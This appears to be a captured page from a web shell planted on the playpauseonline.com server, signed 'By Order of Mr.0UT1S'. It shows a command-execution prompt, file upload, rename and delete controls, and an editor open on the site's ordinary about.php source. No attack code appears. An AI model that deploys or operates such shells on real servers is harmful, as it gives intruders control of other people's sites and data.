home
/
aioutajg
/
playpauseonline.com
/
pages
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
404.php
1.89 KB
Rename
Delete
about.php
4.24 KB
Rename
Delete
blog.php
4.38 KB
Rename
Delete
contact.php
3.20 KB
Rename
Delete
error_log
1.73 KB
Rename
Delete
index.php
0 bytes
Rename
Delete
main.php
22.72 KB
Rename
Delete
post.php
6.99 KB
Rename
Delete
privacy.php
4.67 KB
Rename
Delete
search.php
8.40 KB
Rename
Delete
terms.php
3.69 KB
Rename
Delete
<?php require_once __DIR__ . '/../includes/config.php'; $pageTitle = "About Us - YouTube Thumbnail Tool by " . SITE_NAME; $pageDescription = "Learn how " . SITE_NAME . " helps millions of content creators optimize their YouTube workflow with fast, secure thumbnail downloads."; $pageKeywords = "about us, play pause online, who we are"; $pageCanonical = SITE_URL . "/pages/about"; include '../includes/header.php'; ?> <main class="page-container about-page"> <header class="page-header"> <h1>About <?= SITE_NAME ?></h1> <p class="lead">Empowering Content Creators</p> </header> <div class="page-content content-format"> <section class="mb-5"> <h2>Our Mission</h2> <p> At <a href="/"><?= SITE_NAME ?></a>, we're on a mission to simplify content creation workflows. Our YouTube Thumbnail Grabber helps over 500,000 creators, marketers, and video editors worldwide work more efficiently. </p> <div class="key-benefits"> <div class="row"> <div class="col-md-4"> <h3 class="text-primary">⚡ Speed</h3> <p>Process 1,200+ requests per second with 99.9% uptime</p> </div> <div class="col-md-4"> <h3 class="text-success">🔒 Security</h3> <p>GDPR-compliant with zero data retention policy</p> </div> <div class="col-md-4"> <h3 class="text-info">🌍 Accessibility</h3> <p>Available in 18 languages with global infrastructure support</p> </div> </div> </div> </section> <section class="mb-5"> <h2>Why We Created This Tool</h2> <blockquote> "As content creators ourselves, we struggled with complicated workflows and unreliable tools. We built <?= SITE_NAME ?> to be the solution we wish we had." - Founding Team </blockquote> </section> <section class="mb-5"> <h2>Our Values</h2> <ul> <li>User privacy is non-negotiable</li> <li>Free access for all creators</li> <li>Continuous improvement through feedback</li> <li>Transparent operations</li> <li>Supporting open-source initiatives</li> </ul> </section> <section class="mb-5"> <h2>Meet the Team</h2> <div class="team-grid"> <div class="team-member"> <img src="<?= SITE_URL ?>/assets/img/m.shoaib.png" alt="Muhammad Shoaib" class="rounded-circle"> <h4>Muhammad Shoaib</h4> <p class="text-muted">Lead Developer</p> </div> <div class="team-member"> <img src="<?= SITE_URL ?>/assets/img/t.haider.png" alt="Tasneem Haider" class="rounded-circle"> <h4>Tasneem Haider</h4> <p class="text-muted">Security Specialist</p> </div> <div class="team-member"> <img src="<?= SITE_URL ?>/assets/img/k.iqbal.png" alt="Kamran Iqbal" class="rounded-circle"> <h4>Kamran Iqbal</h4> <p class="text-muted">User Experience Designer</p> </div> </div> </section> <section class="mb-5"> <h2>Join Our Community</h2> <p> Connect with over 25,000 creators in our <a href="https://facebook.com/PlayPauseOnline/">Facebook Page</a> or follow us on <a href="https://github.com/playpauseonline">GitHub</a> for: </p> <ul> <li>Weekly productivity tips</li> <li>Thumbnail design tutorials</li> <li>Exclusive tool updates</li> <li>Creator success stories</li> </ul> </section> </div> </main> <?php include '../includes/footer.php'; ?>
Save